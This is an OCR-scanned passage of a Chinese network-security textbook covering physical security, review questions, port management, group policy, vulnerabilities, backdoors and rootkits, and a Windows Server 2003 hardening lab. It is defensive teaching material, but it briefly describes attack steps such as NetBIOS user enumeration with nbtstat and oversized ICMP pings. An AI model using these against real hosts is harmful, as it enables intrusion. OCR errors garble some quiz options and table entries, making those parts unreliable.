想 让 你 的 备份 一 直 都 可 用 ,最 好 将 其 存放 在 一 个 安全 的 地 方 .防火 防盗 和 甚至 防止 茶水 洒 
在 上 面 。 

(2) 将 他 人 阻止 在 外 

这 是 限制 物理 接触 和 限制 潜在 破坏 的 一 个 好 主意 ,但 是 你 还 不 能 让 每 个 人 都 远离 你 的 
机 器 。 优 秀 的 物理 安全 计划 的 下 一 阶段 就 是 要 限制 计算 机 的 具体 操作 。 

当 离 开 时 把 计算 机 锁 起 来 。 在 Windows XP 中 ,只 需 按 快捷 键 Ctrl 十 Alt 十 Delete, 然 
后 按 K 键 (Lock 按钮 的 快捷 键 )。 虽 然 身手 敏捷 的 攻击 者 能 在 10s 之 内 不 用 密码 就 可 以 进 
入 你 的 计算 机 并 共享 计算 机 的 磁盘 ,但 是 ,如 果 机 器 被 锁定 ,就 不 会 发 生 这 样 的 情况 。 应 该 
养 成 离开 时 锁定 计算 机 的 习惯 。 

有 了 限制 对 存放 计算 机 的 地 方 的 物理 接触 的 想法 ,其 必然 结果 就 是 限制 人 们 接触 计算 
机 的 部 件 。 可 以 通过 内 建 于 计算 机 的 物理 安全 特性 来 实现 这 一 目标 。 几 乎 每 一 台 计 算 机 都 
具备 一 些 有 用 的 安全 特性 ,可 以 利用 这 些 特性 ,让 你 的 计算 机 更 难以 受 攻击 或 被 盗 (或 者 发 
生 了 最 坏 的 情况 .比如 计算 机 被 盗 , 那 么 也 只 是 损失 一 台 对 他 人 毫 无 价值 的 机 器 而 已 ) 。 
Windows 也 提供 了 许多 有 用 的 特性 。 

@ 锁 住 安放 CPU 的 机 箱 。 许 多 台式 机 机 箱 和 塔 式 机 柜 都 有 锁 片 ,可 以 用 来 阻止 窃贼 
打开 机 箱 。 

@ 使 用 电缆 式 安全 锁 来 防止 别人 窃取 整 台 计算 机 。 对 于 可 以 轻易 地 藏 在 背包 或 外 套 
里 的 便携 式 计算 机 或 小 型 台式 机 来 说 ,这 是 一 个 非常 好 的 主意 。 

@ 配置 BIOS 使 计算 机 不 能 U 盘 等 启动 。 这 使 得 入 侵 者 更 难以 从 你 的 系统 盘 中 删除 
密码 或 账户 数据 。 

@@ 考虑 是 否 值得 花 一 些 钱 ,在 存放 计算 机 的 房间 里 安装 活动 探测 报警 器 。 但 对 于 家 庭 
办 公 室 ,建立 覆盖 整个 办 公 区 域 的 安全 系统 通常 是 一 笔 没 有 必要 的 业务 开支 。 
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回 使 用 syskey 实用 程序 (Windows XP 支持 ) 来 保护 本 地 账户 数据 库 、EFS 
(Encrypting File System, 加 密 文件 系统 ) 加 密 密 钥 的 本 地 副本 以 及 其 他 不 想 让 攻击 者 获取 
的 重要 数据 。 

@ 使 用 EFS 对 计算 机 上 的 敏感 文件 夹 进行 加 密 。 不 管 使 用 的 是 便携 机 、 台 式 机 或 服 
务 器 ,EFS 都 可 以 添加 一 层 额外 的 保护 。 

(3) 保护 你 的 设备 

网 络 电缆 连接 、 集 线 器 甚至 外 部 网 络 接口 都 是 网 络 中 非常 易于 受到 攻击 的 地 方 。 能 够 
连接 到 你 的 网 络 中 的 攻击 者 可 以 窃取 正在 传送 的 数据 ,或 者 对 你 的 网 络 或 其 他 网 络 中 的 计 
算 机 发 动 攻 击 。 如 果 可 能 ,将 集线器 和 交换 机 放 在 有 人 看 管 的 房间 里 ,或 者 放 在 上 锁 的 机 柜 
中 , 沿 着 墙 和 天 花 板 分 布 电缆 ,使 其 不 容易 接触 到 ,此 外 还 要 确保 你 的 外 部 数据 连接 点 处 于 
锁定 状态 。 

其 他 方面 技巧 还 有 : 

Q@ 如 果 家 用 计算 机 或 办 公 计 算 机 使 用 ADSL 连接 ,应 确保 电话 公司 的 接口 盒 已 经 上 
锁 一 一 如 果 电 缆 连 接 出 现状 况 , 则 ADSL 服务 也 将 中 断 。 

@ 如 果 想 使 用 无 线 网 络 连接 ,应 确保 自己 了 解 安全 要 求 。 简 单 地 说 ,需要 保护 网 络 的 
安全 ,这 样 外 部 攻击 者 就 无 法 截获 你 的 流量 或 进入 你 的 网 络 。 这 在 Windows XP 中 都 很 容 
易 办 到 。 

加 强 物理 安全 很 容易 做 到 ,而且 不 需要 很 大 的 开销 ,尤其 与 之 所 带 来 的 安全 利益 相 比 ， 
这 点 花费 是 非常 值得 的 。 


16 习 题 
一 、 选 择 题 
1. 计算 机 网 络 安全 是 指 。 
A. 信息 存储 安全 B. 网 络 使 用 者 的 安全 
C. 网 络 中 信息 的 安全 D. 网 络 的 财产 安全 


2. 网 络 信 息 安 全 就 是 要 防止 非法 攻击 和 病毒 的 传播 ,保障 电子 信息 的 有 效 性 ,从 具体 
的 意义 上 来 理解 .需要 保证 以 下 。 
工 .保密 性 开 . 完整 性 三 . 可 用 性 . 可 控 性 V. 不 可 否认 性 


A. 工 . 工 和 芽 B. 工 工 和 
C. 工 、 开 和 TV D. 都 是 
3. 以 下 不 是 保证 网 络 安全 的 要 素 。 
A. 信息 的 保密 性 B. 发 送信 息 的 不 可 否认 性 
C. 数据 交换 的 完整 性 D. 数据 存储 的 唯一 性 
4. 信息 风险 主要 是 指 
A. 信息 存储 安全 B. 信息 传输 安全 
C. 信息 访问 安全 D. 以 上 都 正确 
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5 不 是 信息 失真 的 原因 。 
A. 信 源 提供 的 信息 不 安全 ,不 准确 
B. 信息 在 编码 . 译 码 和 传递 过 程 中 受到 干扰 
C. 信和 宿 接收 信息 出 现 偏 差 
D. 信息 在 理解 上 的 偏差 


6. 以 下 是 用 来 保证 硬件 和 软件 本 身 的 安全 的 。 
A. 实体 安全 B. 运行 安全 
C. 信息 安全 D. 系统 安全 
7. 黑客 搭 线 窃 听 属 于 风险 。 
A. 信息 存储 安全 B. 信息 传输 安全 
C. 信息 访问 安全 D. 以 上 都 不 正确 
8. 信息 不 泄露 给 非 授权 的 用 户 .实体 或 过 程 , 指 的 是 信息 
A. 保密 性 B. 完整 性 
C. 可 用 性 D. 可 控 性 
9. 策略 是 防止 非法 访问 的 第 一 道 防线 。 
A. 入网 访问 控制 B. 网 络 权限 控制 
C. 目录 级 安全 控制 D. 属性 安全 控制 
10. 对 企业 网 络 最 大 的 威胁 是 
A. 黑客 攻击 B. 外 国政 府 
C. 竞争 对 手 D. 内 部 员工 的 恶意 攻击 
11. UNIX 和 Windows NT 操作 系统 是 符合 级 别 的 安全 标准 。 
A. A 级 B. DD 级 
C. Cl 级 D. C2 级 
二 、 简 答题 


1. 简 述 影响 网 络 安全 的 主要 因素 。 

2. 网 络 安全 涉及 哪些 内 容 ? 

3. 列举 出 网 络 安全 保障 的 主要 技术 。 

4. 列举 出 在 你 身边 网 络 安全 威胁 的 例子 。 

三 、 操 作 练 习题 

在 VMware Workstation 软件 上 安装 Windows Server 2000 虚拟 机 。 
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21 项 目 提 人 出 


张 先 生 的 计算 机 新 装 了 Windows Server 2003 操作 系统 ,该 系统 具有 高 性 能 、 高 可 靠 性 
和 高 安全 性 等 特点 。Windows Server 2003 在 默认 安装 的 时 候 , 基 于 安全 的 考虑 已 经 实施 
了 很 多 安全 策略 ,但 由 于 服务 器 操作 系统 的 特殊 性 ,在 默认 安装 完成 后 还 需要 张 先生 对 其 进 
行 安全 加 固 ,进一步 提升 服务 器 操作 系统 的 安全 性 ,保证 应 用 系统 以 及 数据 库 系统 的 安全 。 


22 项 目 分 析 


在 安装 Windows Server 2003 操作 系统 时 ,为 了 提高 系统 的 安全 性 , 张 先 生 按 系统 建 
议 ,采用 最 小 化 方式 安装 ,只 安装 网 络 服务 所 必需 的 组 件 。 如 果 以 后 有 新 的 服务 需求 ,再 安 
装 相 应 的 服务 组 件 .并 及 时 进行 安全 设置 。 

在 完成 操作 系统 安装 全 过 程 后 , 张 先生 要 对 Windows 系统 安全 性 方面 进行 加 固 ,系统 
加 固 工作 主要 包括 账户 安全 配置 密码 安全 配置 、 系 统 安全 配置 .服务 安 全 配置 以 及 禁用 注 
册 表 编辑 器 等 内 容 , 从 而 使 得 操作 系统 变 得 更 加 安全 可 靠 ,为 以 后 的 工作 提供 了 一 个 良好 的 
环境 平台 。 

操作 系统 的 安全 是 整个 计算 机 系统 安全 的 基础 ,其 安全 问题 日 益 引 起 人 们 的 高 度 重视 。 
作为 用 户 使 用 计算 机 和 网 络 资源 的 操作 界面 ,操作 系统 发 挥 着 十 分 重要 的 作用 。 因 此 ,操作 
系统 本 身 的 安全 就 成 了 安全 防护 的 头等 大 事 。 


23 相关 知识 点 


2.3.1 操作 系统 安全 的 概念 


操作 系统 的 安全 防护 研究 通常 包括 以 下 几 个 方面 的 内 容 。 
(1) 操作 系统 本 身 提供 的 安全 功能 和 安全 服务 。 日 前 的 操作 系统 本 身 往往 要 提供 一 定 
的 访问 控制 .认证 与 授权 等 方面 的 安全 服务 ,如 何 对 操作 系统 本 身 的 安全 性 能 进行 研究 和 开 
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发 使 之 符合 选 定 的 环境 和 需求 。 

(2) 针对 各 种 常用 的 操作 系统 ,进行 相关 配置 ,使 之 能 正确 应 对 和 防御 各 种 入 侵 。 

(3) 保证 操作 系统 本 身 所 提供 的 网 络 服 务 能 得 到 安全 配置 。 

一 般 来 说 ,如 果 说 一 个 计算 机 系统 是 安全 的 ,那么 是 指 该 系统 能 够 控制 外 部 对 系统 信息 
的 访问 。 也 就 是 说 ,只 有 经 过 授权 的 用 户 或 代表 该 用 户 运行 的 进程 才能 读 、 写 .创建 或 删除 
信息 。 

操作 系统 内 的 活动 都 可 以 认为 是 主体 对 计算 机 系统 内 部 所 有 客体 的 一 系列 操作 。 主 体 
是 指 发 出 访问 操作 、 存 取 请 求 的 主动 方 , 它 包括 用 户 ,用 户 组 、 主 机、 终端 或 应 用 进程 等 。 主 
体 可 以 访问 客体 。 客 体 是 指 被 调用 的 程序 或 要 存 取 的 数据 访问 , 它 包 括 文件 程序. 内存、 目 
录 、 队 列 、 进 程 间 报 文 .I/O 设备 和 物理 介质 等 。 主 体 对 客体 的 安全 访问 策略 是 一 套 规则 ,可 
用 于 确定 一 个 主体 是 否 对 客体 拥有 访问 能 力 。 

一 般 所 说 的 操作 系统 的 安全 通常 包含 两 方面 的 含义 :@ 操作 系统 在 设计 时 通过 权限 访 
问 控制 .信息 加 密 性 保护 ,完整 性 鉴定 等 机 制 实现 的 安全 ;@ 操作 系统 在 使 用 中 ,通过 一 系 
列 的 配置 ,保证 操作 系统 避免 由 于 实现 时 的 缺陷 或 者 应 用 环境 因素 产生 的 不 安全 因素 。 只 
有 在 这 两 方面 同时 努力 ,才能 够 最 大 可 能 地 建立 安全 的 操作 系统 。 


2.3.2 服务 与 端口 


我 们 知道 ,一 台 拥 有 IP 地 址 的 主机 可 以 提供 许多 服务 ,比如 Web 服务 FTP 服务 、 
SMTP 服务 等 ,这 些 服务 完全 可 以 通过 1 个 IP 地 址 来 实现 。 那 么 ,主机 是 怎样 区 分 不 同 的 
网 络 服务 呢 ? 显然 不 能 只 靠 IP 地 址 ,因为 IP 地 址 与 网 络 服务 的 关系 是 一 对 多 的 关系 。 实 
际 上 是 通过 *IP 地 址 十 端口 号 ?来 区 分 不 同 的 服务 的 。 

我 们 来 打 个 形象 的 比喻 : 假设 IP 地 址 是 一 栋 大 楼 的 地 址 ,那么 端口 号 就 代表 着 这 栋 大 
楼 的 不 同房 间 。 如 果 一 封 信 ( 数 据 包 ) 上 的 地 址 仅 包含 了 这 栋 大 楼 的 地 址 (IP) 而 没有 具体 的 
房间 号 (端口 号 ) ,那么 没有 人 知道 谁 (网 络 服务 ) 应 该 去 接收 它 。 为 了 让 邮递 成 功 ,发 信人 不 
仅 需 要 写 明 大 楼 的 地 址 (IP 地 址 ) ,还 需要 标注 具体 的 收 信人 房间 号 (端口 号 ) ,这 样 这 封 信 
才能 被 顺利 地 投递 到 它 应 该 前 往 的 房间 。 

端口 是 计算 机 与 外 界 通信 的 渠道 ,它们 就 像 一 道道 门 一 样 控制 着 数据 与 指令 的 传输 。 
各 类 数据 包 在 最 终 封 包 时 都 会 加 入 端口 信息 ,以便 在 数据 包 接 收 后 拆 包 识别 。 我 们 知道 , 许 
多 蜂 虫 病毒 正 是 利用 了 端口 信息 才 实 现 恶意 骚扰 的 。 所 以 ,对 于 原本 脆弱 的 Windows 系统 
来 说 ,有 必要 把 一 些 危险 而 又 不 常用 到 的 端口 关闭 或 者 封锁 ,以 保证 网 络 安全 。 

同样 地 , 面 对 网 络 攻击 时 ,端口 对 于 黑客 来 说 至 关 重 要 。 每 一 项 服务 都 对 应 相应 的 端口 
号 ,比如 我 们 浏览 网 页 时 ,需要 服务 器 提供 WWW 服务 ,端口 号 是 80,SMTP 服务 的 端口 号 
是 25,FTP 服务 的 端口 号 是 21, 如 果 企业 中 的 服务 器 仅仅 是 文件 服务 或 者 做 内 网 交换 ,应 
关闭 不 必要 的 端口 ,因为 在 关闭 这 些 端 口 后 ,可 以 进一步 保障 系统 的 安全 。 

我 们 知道 ,在 TCP 和 UDP 协议 中 , 源 端口 和 目标 端口 是 用 一 个 16 位 无 符号 整数 来 表 
示 的 ,这 就 意味 着 端口 号 共有 65536 个 (二 2* .0 一 65535) 。 

按 对 应 的 协议 类 型 ,端口 有 两 种 :TCP 端口 和 UDP 端口 。 由 于 TCP 和 UDP 两 个 协议 
是 独立 的 ,因此 各 自 的 端口 号 也 相互 独立 ,比如 TCP 有 235 端口 ,UDP 也 可 以 有 235 端口 ， 
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两 者 并 不 冲突 。 

IETF 定义 了 以 下 三 种 端口 组 。 

(1) 公认 端口 (Well-Known Ports) :从 0 一 1023 ,它们 紧密 绑 定 (binding) 于 一 些 服务 。 
通常 这 些 端口 的 通信 明确 表明 了 某 种 服务 的 协议 。 例 如 ,80 端口 实际 上 总 是 HTTP 通信 。 

(2) 注册 端口 (Registered Ports) :从 1024 一 49151。 它 们 松散 地 绑 定 于 一 些 服务 。 也 
就 是 说 ,有 许多 服务 绑 定 于 这 些 端口 ,这些 端 口 同样 用 于 许多 其 他 目的 。 例 如 ,许多 系统 处 
理 动态 端口 从 1024 左右 开始 。 

(3) 动态 和 (或 ) 私 有 端口 (Dynamic and/or Private Ports) :从 49152 一 65535。 理 论 上 ， 
不 应 为 服务 分 配 这 些 端口 。 实 际 上 ,机 器 通常 从 1024 起 分 配 动态 端口 。 但 也 有 例外 ,如 
SUN 的 RPC 端口 从 32768 开始 。 

常用 的 TCP/UDP 端口 号 见 表 2-1。 


表 2-1 常用 的 TCP/UDP 端口 号 


TCP 端口 号 UDP 端口 号 
端口 号 服务 端口 号 服务 
0 保留 0 保留 
20 FTP-data 49 Login 
21 FTP-command 53 DNS 
23 Telnet 69 TFTP 
25 SMTP 80 WWW 
53 DNS 88 Kerberos 
79 Finger 110 POP3 
80 WWW 161 SNMP 
88 Kerberos 213 IPX 
139 NetBIOS 2049 NFS 
443 SHTIP 443 S-HTTP 


管理 好 端口 号 在 网 络 安全 中 有 着 非常 重要 的 意义 ,黑客 往往 通过 探测 目标 主机 开启 的 
端口 号 进行 攻击 。 所 以 :对 那些 没有 用 到 的 端口 号 ,最 好 将 它们 关闭 。 

一 个 通信 连接 中 : 源 端 口 与 目标 端口 并 不 是 相同 的 ,如 客户 机 访问 WWW 服务 器 时 ， 
WWW 服务 器 使 用 的 是 80 端口 ,而 客户 端的 端口 则 是 系统 动态 分 配 的 大 于 1023 的 随机 
端口 。 

开启 的 端口 可 能 被 攻击 者 利用 ,如 利用 扫描 软件 :可 以 扫描 到 目标 主机 中 开启 的 端口 及 
服务 ,因为 提供 服务 就 有 可 能 存在 漏洞 。 入 侵 者 通常 会 用 扫描 软件 对 目标 主机 的 端口 进行 
扫描 ,以 确定 哪些 端口 是 开放 的 。 从 开放 的 端口 ,入 侵 者 可 以 知道 目标 主机 大 致 提供 了 哪些 
服务 ,进而 寻找 可 能 存在 的 漏洞 。 因 此 对 端口 的 扫描 有 助 于 了 解 日 标 主机 ,从 管理 角度 来 
看 .扫描 本 机 的 端口 也 是 做 好 安全 防范 的 前 提 。 

查看 端口 的 相关 工具 有 :Windows 系统 中 的 netstat 命令 .fport 软件 ,activeport 软件 、 
superscan 软件 Visual Sniffer 软件 等 ,此 类 命令 或 软件 可 用 来 查看 主机 所 开放 的 端口 。 
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可 以 在 网 上 查看 各 种 服务 对 应 的 端口 号 和 木马 后 门 常 用 端口 来 判断 系统 中 的 可 疑 端 
口 ,并 通过 软件 查看 开启 此 端口 的 进程 。 

确定 可 疑 端口 和 进程 后 ,可 以 利用 防火 墙 来 屏蔽 此 端口 :也 可 以 通过 选择 “本 地 连接 ”一 
TCP/IP 一 “高 级 ”一 “选项 ”一 “TCP/IP 筛选 ,启用 筛选 机 制 来 过 滤 这 些 端 口 ; 对 于 
Windows 系统 主机 ,如 不 对 外 提供 服务 也 可 以 进行 过 滤 设 置 。 对 于 网 络 中 的 普通 客户 计算 
机 ,可 以 限制 对 外 的 所 有 的 端口 ,不必 对 外 提供 任何 服务 ;而 对 于 服务 器 , 则 把 需要 提供 服务 
的 端口 ,如 WWW 服务 端口 80 等 开放 ,不 使 用 的 其 他 端口 则 全 部 关闭 。 可 以 利用 端口 查看 
工具 检查 开启 的 非 业 务 端口 。 

关闭 端口 的 方法 非常 简单 ,在 “控制 面板 ”>“ 管 理工 具 ” 一 “服务 ”中 即 可 配置 。 

一 些 端口 常常 会 被 攻击 者 或 病毒 木马 所 利用 .如 端口 21、22、23、25、80、110、111、119、 
135、137、138、139、161、177、389、3389 等 。 关 于 常见 木马 程序 所 使 用 的 端口 可 以 在 网 上 查 
找到 。 

这 里 重点 说 说 139 端口 ,139 端口 也 就 是 NetBIOS Session 端口 ,用 作文 件 和 打印 的 共 
享 。 关闭 139 端口 的 方法 是 在 “本 地 连接 ”中 选取 “Internet 协议 (TCP/IP)” 属 性 ,进入 “高 
级 TCP/IP 设置 ”, 在 WINS 选项 卡 中 ,有 一 “禁用 TCP/IP 的 NetBIOS” 选 项 ,选中 后 即 可 关 
闭 139 端口 。 

为 什么 要 关闭 139 端口 呢 ? 这 里 涉及 一 个 139 端口 人 侵 的 问题 。 如 果 黑 客 确定 一 台 存 
在 139 端口 漏洞 的 主机 ,用 扫描 工具 扫描 ,然后 使 用 nbtstat -a IP 命令 得 到 用 户 的 情况 ,最 
后 完成 非法 访问 的 操作 。 


2.3.3 组 策略 


组 策略 和 注册 表 是 Windows 系统 中 重要 的 两 部 控制 台 。 对 于 系统 中 安全 方面 的 部 
署 , 组 策略 又 以 其 直观 化 的 表现 形式 更 受用 户 青睐 。 我 们 可 以 通过 组 策略 禁止 第 三 方 非 
法 更 改 地 址 .也 可 以 禁止 别人 随意 修改 防火 墙 配置 参数 ,更 可 以 提高 共享 密码 强度 免 遭 
其 被 破解 。 

例如 ,在 一 个 特定 网 络 环境 中 ,如 果 部 分 用 户 共同 使 用 相同 的 一 台 工 作 站 进行 网 络 访问 
时 ,安全 隐患 就 显露 出 来 、 倘 若 我 们 没有 划 定 安全 的 上 网 区 域 , 那 样 会 造成 工作 站 的 权限 率 
乱 , 从 而 带 来 系统 危机 。 轻 者 造成 系统 瘫痪 , 重 者 则 可 遭受 远程 人 侵 ,损失 宝贵 资料 。 所 以 ， 
为 了 保护 本 地 网 络 以 及 本 地 工作 站 的 安全 :我 们 可 以 尝试 在 公共 计算 机 系统 中 ,通过 设置 组 
策略 的 方法 为 普通 用 户 界定 安全 上 网 区 域 .强制 进入 系统 的 用 户 只 能 在 设 定 内 的 安全 区 域 
中 上 网 冲浪 。 

由 于 组 策略 有 着 直观 的 名 字 和 功能 解释 ,所 以 应 用 上 比较 简单 ,对 于 管理 员 和 终端 用 户 
都 非常 方便 ,但 它 的 功能 远 没有 限制 起 来 那样 简单 .我 们 可 以 将 它 作 为 一 种 安全 保护 跟踪 工 
具 。 例 如 :可 以 利用 组 策略 寻找 共享 目录 访问 痕迹 。 

这 对 于 局 域 网 内 的 用 户 监测 来 说 非常 重要 。 因 为 在 网 络 内 部 ,一 旦 出 现 非法 用 户 , 大 多 
与 共享 人 侵 和 访问 共享 资源 有 关 , 此 时 查询 共享 日 录 的 访问 信息 就 可 以 追踪 求 源 , 查 到 真 
凶 。 打 开 组 策略 后 在 左 侧 列表 区 域 中 的 “本 地 计算 机 策略 >“ 计算 机 配置 ”>“Windows 
设置 "一 “安全 设置 "一 “本 地 策略 ”一 “审核 策略 ”选项 ,在 “审核 策略 ”中 找到 “审核 对 象 访 
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问 ”, 选 中 属性 界面 中 的 “失败 ” “成 功 ? 选 项 ,以 后 出 现 问题 时 就 能 有 针对 性 地 进入 系统 安全 
日 志文 件 ,来 查看 相关 事件 记录 。 


2.3.4 账户 与 密码 安全 


账户 与 密码 的 使 用 通常 是 许多 系统 预 设 的 防护 措施 。 事 实 上 ,有 许多 用 户 的 密码 是 很 
容易 被 猜 中 的 ,或 者 使 用 系统 预 设 的 密码 ,甚至 不 设 密码 。 用 户 应 该 避免 使 用 不 当 的 密码 、 
系统 预 设 密码 或 是 使 用 空白 密码 ,也 可 以 配置 本 地 安全 策略 要 求 密码 符合 安全 性 要 求 。 


2.3.5 漏洞 与 后 门 


1. 漏洞 


漏洞 即 某 个 程序 (包括 操作 系统 ) 在 设计 时 未 考虑 周全 , 当 程序 遇 到 一 个 看 似 合理 , 但 实 
际 无 法 处 理 的 问题 时 ,引发 的 不 可 预见 的 错误 。 系 统 漏洞 又 称 安全 缺陷 ,对 用 户 造成 的 不 良 
后 果 有 :中 如 漏洞 被 恶意 用 户 利用 ,会 造成 信息 泄露 。 例 如 ,黑客 攻击 网 站 即 利用 网 络 服 务 
器 操作 系统 的 漏洞 。@@ 对 用 户 操作 造成 不 便 。 例 如 ,不 明 原 因 的 死机 和 丢失 文件 等 。 

可 见 , 仅 有 堵 住 系统 漏洞 ,用 户 才 会 有 一 个 安全 和 稳定 的 工作 环境 。 

漏洞 的 产生 大 致 有 以 下 3 个 原因 。 

@ 编程 人 员 的 人 为 因素 。 在 程序 编写 过 程 中 ,为 实现 不 可 告 人 的 目的 ,在 程序 代码 的 
隐蔽 处 留 有 后 门 。 

@ 受 编程 人 员 的 能 力 、 经 验 和 当时 安全 技术 所 限 ,在 程序 中 难免 会 有 不 足 之 处 , 轻 则 影 
响 程 序 效率 , 重 则 导致 非 授权 用 户 的 权限 提升 。 

@ 由 于 硬件 原因 ,使 编程 人 员 无 法 弥补 硬件 的 漏洞 ,从 而 使 硬件 的 问题 通过 软件 表现 
出 来 。 

可 以 说 ,几乎 所 有 的 操作 系统 都 不 是 十 全 十 美的 ,总 是 存在 各 种 安全 漏洞 。 例 如 在 
Windows NT 中 ,安全 账户 管理 (SAM) 数 据 库 可 以 被 以 下 用 户 所 复制 :Administrator 账 
户 、Administrators 组 中 的 所 有 成 员 、 备 份 操作 员 、 服 务 器 操作 员 以 及 所 有 有 具有 备份 特权 的 
人 员 。SAM 数据 库 的 一 个 备份 能 够 被 某 些 工 具 所 利用 来 破解 口令 。 又 如 ,Windows NT 对 
较 大 的 ICMP 数据 包 是 很 脆弱 的 ,如 果 发 一 条 ping 命令 ,指定 数据 包 的 大 小 为 64KB， 
Windows NT 的 TCP/IP 栈 将 不 会 正常 工作 ,可 使 系统 离线 乃至 重新 启动 ,结果 造成 某 些 服 
务 的 拒绝 访问 。 

任何 软件 都 难免 存在 漏洞 :但 作为 系统 最 核心 的 软件 :操作 系统 存在 的 漏洞 会 使 黑客 有 
机 可 乘 。 例 如 ,64 位 Windows 7 图 形 显 示 组 件 中 的 一 个 漏洞 有 可 能 导致 系统 崩溃 ,或 者 被 
黑客 利用 并 执行 远程 代码 ,用 户 可 以 通过 关闭 Windows Aero 的 方式 或 打上 安全 补丁 来 防 
止 这 一 漏洞 被 他 人 利用 。 

实际 上 ,根据 目前 的 软件 设计 水 平和 开发 工具 .要 想 绝对 避免 软件 漏洞 几乎 是 不 可 能 
的 。 操 作 系统 作为 一 种 系统 软件 ,在 设计 和 开发 过 程 中 造成 这 样 或 那样 的 缺陷 , 埋 下 一 些 安 
全 隐患 ,使 黑客 有 机 可 乘 ,也 可 以 理解 。 可 以 说 ,软件 质量 决定 了 软件 的 安全 性 。 
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2. 后 门 


后 门 又 称 为 Back Door, 是 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 方法 。 在 软 
件 的 开发 阶段 ,程序 员 常 会 在 软件 内 创建 后 门 以 便 可 以 修改 程序 中 的 缺陷 。 如 果 后 门 被 其 
他 人 知道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 ,那么 它 就 成 了 安全 风险 。 

后 门 产生 的 必要 条 件 如 下 。 

@ 必须 以 某 种 方式 与 其 他 终端 节点 相连 。 因 为 都 是 从 其 他 节点 访问 后 门 ,因此 必须 使 
用 双 绞 线 、. 光 纤 . 串 /并 口 .蓝牙 .红外 等 设备 与 目标 主机 连接 才 可 以 对 端口 进行 访问 。 只 有 
访问 成 功 ,双方 才 可 以 进行 信息 交流 ,攻击 方 可 有 机 会 进行 人 侵 。 

@ 目标 主机 默认 开放 的 可 供 外 界 访问 的 端口 必须 在 一 个 以 上 。 因 为 一 台 默 认 无 任何 
端口 开放 的 机 器 是 无 法 进行 通信 的 ,而 如 果 开 放 的 端口 无 法 被 外 界 访问 , 则 目标 主机 同样 不 
可 能 遭 到 入 侵 。 

@ 日 标 机 存在 程序 设计 或 人 为 政 忽 ,导致 攻击 者 能 以 权限 较 高 的 身份 执行 程序 。 并 不 
是 任何 一 个 权限 的 账号 都 能 够 被 利用 的 ,只 有 权限 达到 操作 系统 一 定 要 求 后 , 才 人 允许 执行 修 
改 注册 表 、 修 改 日 志 记 录 等 操作 。 

后 门 的 分 类 方式 有 多 种 .为 了 便于 大 家 理解 ,下 面 从 技术 方面 来 考虑 后 门 的 分 类 方法 。 

@ 网 页 后 门 。 这 类 后 门 一 般 都 是 利用 服务 器 上 正常 的 Web 服务 来 构造 自己 的 连接 方 
式 , 比 如 现在 非常 流行 的 ASP、CGI 脚本 后 门 等 。 

@ 线程 插入 后 门 。 利 用 系统 自身 的 某 个 服务 或 者 线程 ,将 后 门 程序 插入 其 中 ,这 也 是 
现在 最 流行 的 一 个 后 门 技术 。 

@ 扩展 后 门 。 所 谓 的 “扩展 ”, 是 指 在 功能 上 有 大 的 提升 , 比 普通 的 单一 功能 的 后 门 有 
更 强 的 使 用 性 ,这 种 后 门 本 身 就 相当 于 一 个 小 的 安全 工具 包 , 能 实现 非常 多 的 常见 安全 
功能 。 

@ C/S 后 门 。 采 用 “客户 端 /服务 器 "的 控制 方式 .通过 某 种 特定 的 访问 方式 来 启动 后 
门 ,从 而 达到 控制 服务 器 的 日 的 。 

@ root kit。root kit 出 现 于 20 世纪 90 年 代 初 .在 1994 年 2 月 的 一 篇 安全 咨询 报告 中 
首先 使 用 了 root kit 这 个 名 词 。root kit 是 攻击 者 用 来 隐藏 自己 的 踪迹 和 保留 root 访问 权 
限 的 工具 。 通 常 ,攻击 者 通过 远程 攻击 获得 root 访问 权限 ,进入 系统 后 ,攻击 者 会 在 侵入 的 
主机 中 安装 root kit, 然 后 他 将 经 常 通过 root kit 的 后 门 检查 是 否 有 其 他 的 用 户 登录 系统 ， 
如 果 只 有 自己 ,攻击 者 就 开始 清理 日 志 中 的 有 关 信 息 。 通 过 root kit 的 嗅 探 器 获得 其 他 系 
统 的 用 户 和 密码 之 后 ,攻击 者 就 会 利用 这 些 信 息 侵 入 其 他 系统 。 


3. 漏洞 与 后 门 的 区 别 


后 门 是 留 在 计算 机 系统 中 ,通过 某 种 特殊 方式 控制 计算 机 系统 以 供 某 类 特殊 使 用 的 途 
径 。 它 不 仅 绕 过 系统 已 有 的 安全 设置 .而 且 还 能 挫败 系统 上 的 各 种 增强 的 安全 设置 。 
漏洞 是 在 硬件 .软件 .协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 .攻击 者 能 够 利用 
这 些 漏洞 在 未 授权 的 情况 下 访问 或 破坏 系统 。 
漏洞 虽然 可 能 最 初 就 存在 于 系统 当中 .但 漏洞 并 不 是 自己 出 现 的 ,必须 有 人 来 发 现 。 在 
实际 使 用 中 ,用 户 会 发 现 系 统 中 存在 的 错误 ,而 入 侵 者 会 有 意 利用 其 中 的 某 些 错误 来 威胁 系 
35 


网 络 安全 技术 项 目 化 教程 


统 安全 ,这 时 人 们 会 认识 到 这 个 错误 是 一 个 漏洞 。 然 后 系统 供应 商会 尽快 发 布 针 对 这 个 漏 
洞 的 补丁 程序 。 

漏洞 和 后 门 是 不 同 的 ,漏洞 是 一 种 无 意 的 行为 是 不 可 避免 的 ,是 难以 预知 的 ,无 论 是 硬件 
还 是 软件 都 存在 着 漏洞 ;而 后 门 是 一 种 有 意 的 行为 .是 人 为 故意 设置 的 ,是 完全 可 以 避免 的 。 


24 项 目 实 施 


2.4.1 任务 1: 账 户 安全 配置 


1. 任务 目标 


(1) 了 解 操作 系统 账户 安全 的 重要 性 。 
(2) 掌握 账户 安全 配置 的 方法 。 


2. 任务 内 容 


(1) 更 改 Administrator 账户 名 称 。 
(2) 创建 一 个 陷阱 账户 。 
(3) 不 让 系统 显示 上 次 登录 的 账户 名 。 


3. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows Server 2003 操作 系统 的 PC 1 台 ,或 Windows Server 2003 虚拟 机 1 台 。 
4. 任务 实施 步骤 


(1) 更 改 Administrator 账户 名 称 

由 于 Administrator 账户 是 微软 操作 系统 的 默认 系统 管理 员 账 户 , 且 此 账户 不 能 被 停 
用 ,这 意味 着 非法 入 侵 者 可 以 一 遍 又 一 遍地 猜测 这 个 账户 的 密码 。 将 Administrator 重 命名 
为 其 他 名 称 , 可 以 有 效 地 解决 这 一 问题 。 下 面 介 绍 Windows Server 2003 中 重 命 名 
Administrator 账户 名 称 的 方法 。 

